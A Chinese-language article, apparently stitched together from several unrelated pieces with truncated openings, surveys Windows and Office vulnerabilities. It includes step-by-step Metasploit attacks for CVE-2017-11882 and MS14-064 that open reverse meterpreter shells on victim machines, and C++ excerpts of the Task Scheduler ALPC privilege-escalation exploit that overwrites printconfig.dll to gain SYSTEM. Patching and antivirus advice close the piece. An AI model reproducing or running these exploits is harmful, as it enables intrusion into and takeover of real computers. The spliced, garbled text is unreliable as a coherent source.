文還原利用微軟office漏洞11882攻擊存在此漏洞電腦的整個(gè)過程。
前一段時(shí)間爆出了最新的Office高危漏洞CVE-2017-11882。2017.11.14微軟發(fā)布11月補(bǔ)丁,修復(fù)了包括CVE-2017-11882在內(nèi)的多個(gè)漏洞。值得注意的是,該漏洞已潛伏17年之久,影響目前流行的所有Office版本! 影響面相當(dāng)廣,此漏洞屬于內(nèi)存損壞漏洞,攻擊者可以利用此漏洞以當(dāng)前用戶的身份執(zhí)行任意指令。
漏洞位于EQNEDT32.EXE組件中,該組件于2001年編譯嵌入office,之后沒有任何進(jìn)一步的修改。攻擊者可以利用漏洞以當(dāng)前登錄的用戶身份執(zhí)行任意命令。
雖然微軟在11月發(fā)布了補(bǔ)丁,但是有相當(dāng)一部分人沒有這些安全意識(shí),也有人認(rèn)為打補(bǔ)丁有時(shí)候會(huì)導(dǎo)致藍(lán)屏等問題發(fā)生,所以不更新windows的補(bǔ)丁,或者僅更新windows補(bǔ)丁而不更新其它Microsoft的產(chǎn)品的補(bǔ)丁。換句話說,大部分人裝了office但是沒有打上這個(gè)補(bǔ)丁,所以目前安全問題還是很嚴(yán)峻。
漏洞利用office的數(shù)學(xué)公式編輯器功能,涉及模塊EQNEDT32.EXE;當(dāng)插入或編輯公式時(shí),它會(huì)以單獨(dú)的進(jìn)程啟動(dòng),而不會(huì)以O(shè)ffice進(jìn)程的子進(jìn)程啟動(dòng)。由于該模塊對(duì)公式的處理邏輯不嚴(yán)謹(jǐn),給予攻擊者可乘之機(jī);攻擊者通過構(gòu)造特定的數(shù)據(jù)內(nèi)容覆蓋掉棧上的函數(shù)返回地址,從而改變函數(shù)的執(zhí)行流程,執(zhí)行任意的指令。
咱們今天針對(duì)這個(gè)漏洞進(jìn)行演示,還原整個(gè)攻擊過程。
1.打開我們的kali(攻擊機(jī))并啟動(dòng)msf。
2.加載office漏洞利用模塊use+模塊,至于這個(gè)模塊在哪里,可以到msf的官方去下載相應(yīng)的腳本。放到kali的msf利用模塊的目錄下就行。
3.我們來配置一下攻擊模塊的參數(shù)。
4. 可以看到我們的名為sp的Word文件已經(jīng)在桌面生成。
5.把這個(gè)文檔發(fā)到我的其他一臺(tái)電腦上(在此提醒大家不要隨意打開來路不明的文件),并用office打開它。靶機(jī)是windows10安裝了office2013。
6.當(dāng)受害者打開這個(gè)Word文檔后,我們回到我們的kali,可以看到msf中的攻擊會(huì)話已經(jīng)建立成功,并且已經(jīng)拿到了(session 1)
7.進(jìn)一步拿到meterpreter,這樣就簡單了,我們可以看看被入侵的win10電腦的信息,正在運(yùn)行的進(jìn)程。還可以給正在使用電腦前的人截個(gè)圖。還有許多令人窒息操作(留后門,創(chuàng)建新用戶等)這里不再贅述。
整個(gè)攻擊過程就是這樣。大家可以結(jié)合上一次那個(gè)比特幣勒索病毒想想,是不是很危險(xiǎn)。再次提醒大家不要隨意點(diǎn)擊來路不明的文件。
歷史證明,一旦PoC公布,漏洞通過專業(yè)的網(wǎng)絡(luò)犯罪組織傳播成為僵尸網(wǎng)絡(luò)的速度很快。用戶應(yīng)立即更新微軟在11月推出的KB2553204、KB3162047、KB4011276和KB4011262補(bǔ)丁以防止CVE-2017-11882遭黑客利用。
除了打補(bǔ)丁,還可以通過安裝殺毒軟件來防止這類事情的發(fā)生,如果設(shè)置好了,像360和電腦管家這些殺毒軟件也可以是不流氓的,還可以選擇像火絨安全軟件那種比較良心的,或者直接用windows10自帶的殺毒軟件,也是很不錯(cuò)的。inRAR 是一款功能強(qiáng)大的壓縮包管理器,它是檔案工具RAR在 Windows環(huán)境下的圖形界面。該軟件可用于備份數(shù)據(jù),縮減電子郵件附件的大小,解壓縮從 Internet 上下載的RAR、ZIP及其它類型文件,并且可以新建 RAR 及 ZIP 格式等的壓縮類文件。
winRAR
近日,國外安全研究人員披露,著名壓縮軟件WinRAR被曝高危漏洞,目前全球已有超過5億用戶受到影響。據(jù)報(bào)道,在WinRAR 的UNACEV2.dll 代碼庫中發(fā)現(xiàn)嚴(yán)重安全漏洞,眾多壓縮工具支持.ace格式文件的解壓縮,存在漏洞的ACE解壓模塊文件unacev2.dll創(chuàng)建于2005年,已經(jīng)14年未更新。
黑客可利用該漏洞繞過權(quán)限提升直接運(yùn)行WinRAR,并將惡意文件放進(jìn)Windows系統(tǒng)的啟動(dòng)文件夾中,只要用戶重新開機(jī)惡意文件即自動(dòng)運(yùn)行,黑客便能“完全控制”受害者計(jì)算機(jī)。騰訊電腦管家剛剛也發(fā)布預(yù)警,安全專家驗(yàn)證,該漏洞不僅僅存在于WinRAR 5.7之前的版本,網(wǎng)民日常使用的Bandizip、2345壓縮、好壓、totalcmd等軟件均存在該風(fēng)險(xiǎn)。騰訊電腦管家建議用戶升級(jí)壓縮軟件到最新版本,或者刪除壓縮解壓軟件安裝目錄下的unacev2.dll文件。
只需要在壓縮工具快捷方式的圖標(biāo)上點(diǎn)擊鼠標(biāo)右鍵,在彈出的菜單中選擇“打開文件位置”即可跳轉(zhuǎn)到壓縮工具目錄,將當(dāng)前目錄下的unacev2.dll文件手動(dòng)刪除即可。
們電腦的windows系統(tǒng),默認(rèn)都會(huì)開啟系統(tǒng)更新,經(jīng)常告訴我們要更新修復(fù)系統(tǒng)漏洞,還有我們也會(huì)自己安裝一些電腦維護(hù)軟件,比如安全衛(wèi)士或電腦管家,有時(shí)系統(tǒng)啟動(dòng)后經(jīng)常會(huì)彈出窗口提示檢測到存在高危漏洞,那么什么是系統(tǒng)漏洞呢?Windows系統(tǒng)漏洞對(duì)電腦會(huì)造成什么危害?常見的漏洞有哪些? 攻擊者是如何利用這些漏洞的?
Windows系統(tǒng)漏洞是指操作系統(tǒng)在開發(fā)過程中存在的技術(shù)缺陷或程序錯(cuò)誤,這些缺陷可能導(dǎo)致其他用戶(比如黑客)非法訪問或利用病毒攻擊計(jì)算機(jī)系統(tǒng),從而竊取電腦重要資料和信息,甚至破壞操作系統(tǒng)。因此,系統(tǒng)開發(fā)商(比如微軟公司)一般每月都會(huì)發(fā)布最新的補(bǔ)丁程序用以修復(fù)新發(fā)現(xiàn)的漏洞。
1、系統(tǒng)漏洞經(jīng)常被不法者或黑客用于向電腦強(qiáng)制安裝惡意程序、傳播病毒以及植入木馬等;
2、系統(tǒng)漏洞容易導(dǎo)致電腦重要的數(shù)據(jù)和信息被竊取,嚴(yán)重者會(huì)導(dǎo)致操作系統(tǒng)被破壞,電腦數(shù)據(jù)全部丟失;
3、在局域網(wǎng)環(huán)境中,還會(huì)造成病毒的傳播,導(dǎo)致其他電腦癱瘓,危害極大;
4、被嚴(yán)重破壞的操作系統(tǒng)只能通過重裝系統(tǒng)來解決,u盤重裝ghost win7教程圖解。
系統(tǒng)漏洞主要分為兩種,一種是高危漏洞,另一種是功能性漏洞:
1、高危漏洞:系統(tǒng)核心和Office 漏洞,這些漏洞允許遠(yuǎn)程執(zhí)行代碼,使得電腦有被入侵的危險(xiǎn)
2、功能性漏洞:軟件版本更新或給系統(tǒng)添加實(shí)用功能,用于解決普通的電腦問題,提升電腦性能
1.Windows XP系統(tǒng)常見漏洞
Windows XP系統(tǒng)常見的漏洞有UPNP服務(wù)漏洞、升級(jí)程序漏洞、幫助和支持中心漏洞、壓縮文件夾漏洞、服務(wù)拒絕漏洞、Windows Media Player漏洞、RDP漏洞、VM漏洞、熱鍵漏洞、賬號(hào)快速切換漏洞等。
(1)UPNP服務(wù)漏洞
漏洞描述:允許攻擊者執(zhí)行任意指令。
Windows XP默認(rèn)啟動(dòng)的UPNP服務(wù)存在嚴(yán)重安全漏洞。UPNP(Universal Plug and Play)體系面向無線設(shè)備、PC和智能應(yīng)用,提供普遍的對(duì)等網(wǎng)絡(luò)連接,在家用信息設(shè)備、辦公用網(wǎng)絡(luò)設(shè)備間提供TCP/IP連接和Web訪問功能,該服務(wù) 可用于檢測和集成UPNP硬件。
UPNP協(xié)議存在安全漏洞,使攻擊者可非法獲取任何Windows XP的系統(tǒng)級(jí)訪問,進(jìn)行攻擊,還可通過控制多臺(tái)XP機(jī)器發(fā)起分布式的攻擊。
防御策略:禁用UPNP服務(wù)后下載并安裝對(duì)應(yīng)的補(bǔ)丁程序。
(2)升級(jí)程序漏洞
漏洞描述:如將Windows XP升級(jí)至Windows XP Pro,IE會(huì)重新安裝,以前打的補(bǔ)丁程序?qū)⒈蝗壳宄?/p>
Windows XP的升級(jí)程序不僅會(huì)刪除IE的補(bǔ)丁文件,還會(huì)導(dǎo)致微軟的升級(jí)服務(wù)器無法正確識(shí)別IE是否存在缺陷,即Windows XP Pro系統(tǒng)存在如下2個(gè)潛在威脅。
·某些網(wǎng)頁或HTML郵件的腳本可自動(dòng)調(diào)用Windows的程序。
·可通過IE漏洞窺視用戶的計(jì)算機(jī)文件。
防御策略:如IE瀏覽器未下載升級(jí)補(bǔ)丁可至微軟網(wǎng)站下載最新補(bǔ)丁程序。
(3)幫助和支持中心漏洞
漏洞描述:刪除用戶系統(tǒng)的文件。
幫助和支持中心提供集成工具,用戶可獲取針對(duì)各種主題的幫助和支持。在Windows XP幫助和支持中心存在漏洞,可使攻擊者跳過特殊網(wǎng)頁(在打開該網(wǎng)頁時(shí)調(diào)用錯(cuò)誤的函數(shù),并將存在的文件或文件夾名字作為參數(shù)傳送)使上傳文件或文件夾的操 作失敗,隨后該網(wǎng)頁可在網(wǎng)站上公布,以攻擊訪問該網(wǎng)站的用戶或被作為郵件傳播來攻擊。該漏洞除使攻擊者可刪除文件外不會(huì)賦予其他權(quán)利,攻擊者既無法獲取系 統(tǒng)管理員的權(quán)限,也無法讀取或修改文件。
防御策略:安裝Windows XP的Service Pack 3。
(4)壓縮文件夾漏洞
漏洞描述:Windows XP壓縮文件夾可按攻擊者的選擇運(yùn)行代碼。
在安裝有"Plus"包的Windows XP系統(tǒng)中,"壓縮文件夾"功能允許將Zip文件作為普通文件夾處理。"壓縮文件夾"功能存在2個(gè)漏洞,如下所述。
·在解壓縮Zip文件時(shí)會(huì)有未經(jīng)檢查的緩沖存在于程序中,以存放被解壓文件,因此很可能導(dǎo)致瀏覽器崩潰或攻擊者的代碼被運(yùn)行。
·解壓縮功能在非用戶指定目錄中放置文件,可使攻擊者在用戶系統(tǒng)的已知位置中放置文件。
防御策略:不接收不信任的郵件附件,也不下載不信任的文件。
(5)服務(wù)拒絕漏洞
漏洞描述:服務(wù)拒絕。
Windows XP支持點(diǎn)對(duì)點(diǎn)的協(xié)議(PPTP)作為遠(yuǎn)程訪問服務(wù)實(shí)現(xiàn)的虛擬專用網(wǎng)技術(shù)。由于在其控制用于建立、維護(hù)和拆開PPTP連接的代碼段中存在未經(jīng)檢查的緩存, 導(dǎo)致Windows XP的實(shí)現(xiàn)中存在漏洞。通過向一臺(tái)存在該漏洞的服務(wù)器發(fā)送不正確的PPTP控制數(shù)據(jù),攻擊者可損壞核心內(nèi)存并導(dǎo)致系統(tǒng)失效,中斷所有系統(tǒng)中正在運(yùn)行的進(jìn) 程。該漏洞可攻擊任何一臺(tái)提供PPTP服務(wù)的服務(wù)器。對(duì)于PPTP客戶端的工作站,攻擊者只需激活PPTP會(huì)話即可進(jìn)行攻擊。對(duì)任何遭到攻擊的系統(tǒng),可通 過重啟來恢復(fù)正常操作。
防御策略:關(guān)閉PPTP服務(wù)。
(6)Windows Media Player漏洞
漏洞描述:可能導(dǎo)致用戶信息的泄漏,腳本調(diào)用,緩存路徑泄漏。
Windows Media Player漏洞主要產(chǎn)生2個(gè)問題:一是信息泄漏漏洞,它給攻擊者提供了一種可在用戶系統(tǒng)上運(yùn)行代碼的方法,微軟對(duì)其定義的嚴(yán)重級(jí)別為"嚴(yán)重";二是腳本 執(zhí)行漏洞,當(dāng)用戶選擇播放一個(gè)特殊的媒體文件,接著又瀏覽一個(gè)特殊建造的網(wǎng)頁后,攻擊者就可利用該漏洞運(yùn)行腳本。由于該漏洞有特別的時(shí)序要求,因此利用該 漏洞進(jìn)行攻擊相對(duì)就比較困難,它的嚴(yán)重級(jí)別也就比較低。
防御策略:將要播放的文件先下載到本地再播放,即可不受利用此漏洞進(jìn)行的攻擊。
(7)RDP漏洞
漏洞描述:信息泄露并拒絕服務(wù)。
Windows操作系統(tǒng)通過RDP(Remote Data Protocol)為客戶端提供遠(yuǎn)程終端會(huì)話。RDP協(xié)議將終端會(huì)話的相關(guān)硬件信息傳送至遠(yuǎn)程客戶端,其漏洞如下所述。
·與某些RDP版本的會(huì)話加密實(shí)現(xiàn)有關(guān)的漏洞。所有RDP實(shí)現(xiàn)均允許對(duì)RDP會(huì)話中的數(shù)據(jù)進(jìn)行加密,在 Windows 2000和Windows XP版本中,純文本會(huì)話數(shù)據(jù)的校驗(yàn)在發(fā)送前并未經(jīng)過加密,竊聽并記錄RDP會(huì)話的攻擊者,可對(duì)該校驗(yàn)密碼分析攻擊并覆蓋該會(huì)話傳輸。
·與Windows XP中的RDP實(shí)現(xiàn)對(duì)某些不正確的數(shù)據(jù)包處理方法有關(guān)的漏洞。當(dāng)接收這些數(shù)據(jù)包時(shí),遠(yuǎn)程桌面服務(wù)將會(huì)失效,同時(shí)也會(huì)導(dǎo)致操作系統(tǒng)失效。攻擊者向一個(gè)已受影響的系統(tǒng)發(fā)送這類數(shù)據(jù)包時(shí),并不需經(jīng)過系統(tǒng)驗(yàn)證。
防御策略:Windows XP默認(rèn)并未啟動(dòng)它的遠(yuǎn)程桌面服務(wù)。即使遠(yuǎn)程桌面服務(wù)啟動(dòng),只需在防火墻中屏蔽3389端口,即可避免該攻擊。
(8)VM漏洞
漏洞描述:可能造成信息泄露,并執(zhí)行攻擊者的代碼。
攻擊者可通過向JDBC類傳送無效的參數(shù)使宿主應(yīng)用程序崩潰,攻擊者需在網(wǎng)站上擁有惡意的Java applet并引誘用戶訪問該站點(diǎn)。惡意用戶可在用戶機(jī)器上安裝任意DLL,并執(zhí)行任意的本機(jī)代碼,潛在地破壞或讀取內(nèi)存數(shù)據(jù)。
防御策略:經(jīng)常進(jìn)行相關(guān)軟件的安全更新。
(9)熱鍵漏洞
漏洞描述:設(shè)置熱鍵后,由于Windows XP的自注銷功能,可使系統(tǒng)"假注銷",其他用戶即可通過熱鍵調(diào)用程序。
熱鍵功能是系統(tǒng)提供的服務(wù),當(dāng)用戶離開計(jì)算機(jī)后,該計(jì)算機(jī)即處于未保護(hù)情況下,此時(shí)Windows XP會(huì)自動(dòng)實(shí)施"自注銷",雖然無法進(jìn)入桌面,但由于熱鍵服務(wù)還未停止,仍可使用熱鍵啟動(dòng)應(yīng)用程序。
防御策略:
①由于該漏洞被利用的前提為熱鍵可用,因此需檢查可能會(huì)帶來危害的程序和服務(wù)的熱鍵。
②啟動(dòng)屏幕保護(hù)程序,并設(shè)置密碼。
③在離開計(jì)算機(jī)時(shí)鎖定計(jì)算機(jī)。
(10)賬號(hào)快速切換漏洞
漏洞描述:Windows XP快速賬號(hào)切換功能存在問題,可造成賬號(hào)鎖定,使所有非管理員賬號(hào)均無法登錄。
Windows XP系統(tǒng)設(shè)計(jì)了賬號(hào)快速切換功能,使用戶可快速地在不同的賬號(hào)間切換,但其設(shè)計(jì)存在問題,可被用于造成賬號(hào)鎖定,使所有非管理員賬號(hào)均無法登錄。配合賬號(hào) 鎖定功能,用戶可利用賬號(hào)快速切換功能,快速重試登錄另一個(gè)用戶名,系統(tǒng)則會(huì)判別為暴力破解,從而導(dǎo)致非管理員賬號(hào)鎖定。
2.Windows 7系統(tǒng)常見漏洞
與Windows XP相比,Windows 7系統(tǒng)中的漏洞就少了很多。Windows 7系統(tǒng)中常見的漏洞有快捷方式漏洞與SMB協(xié)議漏洞2種。
(1)快捷方式漏洞
漏洞描述:快捷方式漏洞是Windows Shell框架中存在的一個(gè)危急安全漏洞。在Shell32.dll的解析過程中,會(huì)通過"快捷方式"的文件格式去逐個(gè)解析:首先找到快捷方式所指向的文 件路徑,接著找到快捷方式依賴的圖標(biāo)資源。這樣,Windows桌面和開始菜單上就可以看到各種漂亮的圖標(biāo),我們點(diǎn)擊這些快捷方式時(shí),就會(huì)執(zhí)行相應(yīng)的應(yīng)用 程序。
微軟Lnk漏洞就是利用了系統(tǒng)解析的機(jī)制,攻擊者惡意構(gòu)造一個(gè)特殊的Lnk(快捷方式)文件,精心構(gòu)造一串程序 代碼來騙過操作系統(tǒng)。當(dāng)Shell32.dll解析到這串編碼的時(shí)候,會(huì)認(rèn)為這個(gè)"快捷方式"依賴一個(gè)系統(tǒng)控件(dll文件),于是將這個(gè)"系統(tǒng)控件"加 載到內(nèi)存中執(zhí)行。如果這個(gè)"系統(tǒng)控件"是病毒,那么Windows在解析這個(gè)lnk(快捷方式)文件時(shí),就把病毒激活了。該病毒很可能通過USB存儲(chǔ)器進(jìn) 行傳播。
防御策略:禁用USB存儲(chǔ)器的自動(dòng)運(yùn)行功能,并且手動(dòng)檢查USB存儲(chǔ)器的根文件夾。
(2)SMB協(xié)議漏洞
SMB協(xié)議主要是作為Microsoft網(wǎng)絡(luò)的通信協(xié)議,用于在計(jì)算機(jī)間共享文件、打印機(jī)、串口等。當(dāng)用戶執(zhí)行 SMB2協(xié)議時(shí)系統(tǒng)將會(huì)受到網(wǎng)絡(luò)攻擊從而導(dǎo)致系統(tǒng)崩潰或重啟。因此,只要故意發(fā)送一個(gè)錯(cuò)誤的網(wǎng)絡(luò)協(xié)議請(qǐng)求,Windows 7系統(tǒng)就會(huì)出現(xiàn)頁面錯(cuò)誤,從而導(dǎo)致藍(lán)屏或死機(jī)。
防御策略:關(guān)閉SMB服務(wù)。
3、Windows 10常見漏洞
本地提權(quán)漏洞:
漏洞背景
win10中任務(wù)調(diào)度服務(wù)導(dǎo)出的函數(shù)沒有驗(yàn)證調(diào)用者的權(quán)限,任意權(quán)限的用戶調(diào)用該函數(shù)可以獲取系統(tǒng)敏感文件的寫權(quán)限,進(jìn)而提權(quán)。
漏洞影響
漏洞影響win10和windows server 2016。目前發(fā)布的EXP暫時(shí)只能用于x64系統(tǒng)。
漏洞詳情
win10系統(tǒng)Task Scheduler任務(wù)調(diào)度服務(wù)中ALPC調(diào)用接口導(dǎo)出了SchRpcSetSecurity函數(shù),該函數(shù)能夠?qū)σ粋€(gè)任務(wù)或者文件夾設(shè)置安全描述符。
HRESULT SchRpcSetSecurity( [in, string] const wchar_t* path, [in,string] const wchar_t* sddl, [in] DWORD flags );
該服務(wù)是通過svchost的服務(wù)組netsvcs所啟動(dòng)的,對(duì)應(yīng)的dll是schedsvc.dll。
在xp系統(tǒng)中,任務(wù)存放在C:\Windows\Tasks目錄,后綴為.job;而win7及以后的版本任務(wù)以xml的格式存放在C:\Windows\System32\Tasks目錄。
可能是為了兼容的考慮,SchRpcSetSecurity函數(shù)在win10中仍然會(huì)檢測C:\Windows\Tasks目錄下是否存在后綴為.job的文件,如果存在則會(huì)寫入DACL數(shù)據(jù)。如果將job文件硬鏈接到特定的dll那么特定的dll就會(huì)被寫入DACL數(shù)據(jù),本來普通用戶對(duì)特定的dll只具有讀權(quán)限,這樣就具有了寫權(quán)限,接下來向dll寫入漏洞利用代碼并啟動(dòng)相應(yīng)的程序就獲得了提權(quán)。
那么首先需要找到一個(gè)普通用戶具有讀權(quán)限而系統(tǒng)具有寫入DACL權(quán)限的dll,EXP中用的是C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_4592475aca2acf83\Amd64\printconfig.dll,然后將C:\Windows\Tasks\UpdateTask.job硬鏈接到這個(gè)dll。
WIN32_FIND_DATA FindFileData; HANDLE hFind; hFind=FindFirstFile(L"C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64*", &FindFileData); wchar_t BeginPath[MAX_PATH]=L"c:\windows\system32\DriverStore\FileRepository\"; wchar_tPrinterDriverFolder[MAX_PATH]; wchar_t EndPath[23]=L"\Amd64\PrintConfig.dll"; wmemcpy(PrinterDriverFolder, FindFileData.cFileName, wcslen(FindFileData.cFileName)); FindClose(hFind); wcscat(BeginPath, PrinterDriverFolder); wcscat(BeginPath, EndPath); //Create a hardlink with UpdateTask.job to our target, this is the file the task scheduler will write the DACL of CreateNativeHardlink(L"c:\windows\tasks\UpdateTask.job", BeginPath);
在調(diào)用SchRpcSetSecurity函數(shù)使普通用戶成功獲取了對(duì)該dll寫入的權(quán)限之后寫入資源文件中的exploit.dll。
//Must be name of final DLL.. might be better ways to grab the handle HMODULE mod=GetModuleHandle(L"ALPC-TaskSched-LPE"); //Payload is included as a resource, you need to modify this resource accordingly. HRSRC myResource=::FindResource(mod, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA); unsigned int myResourceSize=::SizeofResource(mod, myResource); HGLOBAL myResourceData=::LoadResource(mod, myResource); void* pMyBinaryData=::LockResource(myResourceData); //We try to open the DLL in a loop, it could already be loaded somewhere.. if thats the case, it will throw a sharing violation and we should not continue HANDLE hFile; DWORD dwBytesWritten=0; do { hFile=CreateFile(BeginPath,GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL); WriteFile(hFile,(char*)pMyBinaryData,myResourceSize,&dwBytesWritten,NULL); if (hFile==INVALID_HANDLE_VALUE) { Sleep(5000); } } while (hFile==INVALID_HANDLE_VALUE); CloseHandle(hFile);
printconfig.dll和系統(tǒng)打印相關(guān),并且沒有被print spooler服務(wù)默認(rèn)啟動(dòng)。所以隨后調(diào)用StartXpsPrintJob開始一個(gè)XPS打印。
//After writing PrintConfig.dll we start an XpsPrintJob to load the dll into the print spooler service. CoInitialize(nullptr); IXpsOMObjectFactory *xpsFactory=NULL; CoCreateInstance(__uuidof(XpsOMObjectFactory), NULL, CLSCTX_INPROC_SERVER, __uuidof(IXpsOMObjectFactory), reinterpret_cast
(&xpsFactory));
HANDLE completionEvent=CreateEvent(
NULL, TRUE, FALSE,
NULL);
IXpsPrintJob *job=
NULL;
IXpsPrintJobStream *jobStream=
NULL;
StartXpsPrintJob(
L"Microsoft XPS Document Writer",
L"Print Job 1",
NULL,
NULL, completionEvent,
NULL,
0, &job, &jobStream,
NULL);
jobStream->Close();
CoUninitialize();
return
0;
整個(gè)漏洞利用程序編譯出來是個(gè)dll,把它注入到notepad中運(yùn)行,發(fā)現(xiàn)spoolsv.exe創(chuàng)建的notepad已經(jīng)具有SYSTEM權(quán)限,而系統(tǒng)中的printconfig.dll也被修改成了資源文件中的exploit.dll。
防御措施
建議用戶安裝360安全衛(wèi)士等終端防御軟件攔截利用此類漏洞的攻擊,不要打開來源不明的程序。
四、以實(shí)例講解攻擊者是如何利用系統(tǒng)漏洞發(fā)起攻擊的
利用MS14-064 漏洞測試入侵win7
Microsoft Windows OLE遠(yuǎn)程代碼執(zhí)行漏洞,OLE(對(duì)象鏈接與嵌入)是一種允許應(yīng)用程序共享數(shù)據(jù)和功能的技術(shù),
遠(yuǎn)程攻擊者利用此漏洞通過構(gòu)造的網(wǎng)站執(zhí)行任意代碼,影響Win95+IE3 – Win10+IE11全版本...
里已經(jīng)加入了此漏洞的利用模塊 :exploit/windows/browser/ms14_064_ole_code_execution
執(zhí)行命令:
msfconsole //啟動(dòng)MSF
search ms14 //搜索關(guān)鍵字
use exploit/windows/browser/ms14_064_ole_code_execution // 加載漏洞利用模塊
set payload windows/meterpreter/reverse_tcp //設(shè)置反彈連接shell
如圖:
需要注意的是箭頭標(biāo)記的屬性默認(rèn)為false 需要設(shè)置為true ,因?yàn)閙sf中自帶的漏洞利用exp調(diào)用的是 powershell,
所以msf(Metasploit Framework)中的exp代碼只對(duì)安裝powershell的系統(tǒng)生效。安裝自帶powershell,
所以我們這里測試受害的機(jī)器為windows7 32位.
按照?qǐng)D中各個(gè)屬性配置好后 執(zhí)行exploit即可
得到一個(gè)URL地址,復(fù)制到受害者機(jī)器(win7)測試
當(dāng)用戶點(diǎn)擊允許了后
可以看見這邊反彈了一個(gè)shell,接下里我們就可以隨便搞了,
攻擊成功,結(jié)束!!!
五、漏洞攻擊如何防護(hù)
1、及時(shí)修復(fù)系統(tǒng)環(huán)境中存在的安全漏洞
防范漏洞攻擊最直接有效的方法就是修復(fù)系統(tǒng)環(huán)境中存在的安全漏洞。
2、 保持騰訊電腦管家、360安全衛(wèi)士等安全軟件的正常開啟
正常開啟騰訊電腦管家或者360安全衛(wèi)士等安全軟件,可以有效攔截利用漏洞觸發(fā)傳播的病毒,有效彌補(bǔ)漏洞修復(fù)的不足。
3、 培養(yǎng)良好的計(jì)算機(jī)使用習(xí)慣
a) 提高計(jì)算機(jī)網(wǎng)絡(luò)安全意識(shí)
b) 不要輕易下載不明軟件程序
c) 不要輕易打開不明郵件夾帶的可疑附件
d) 及時(shí)備份重要的數(shù)據(jù)文件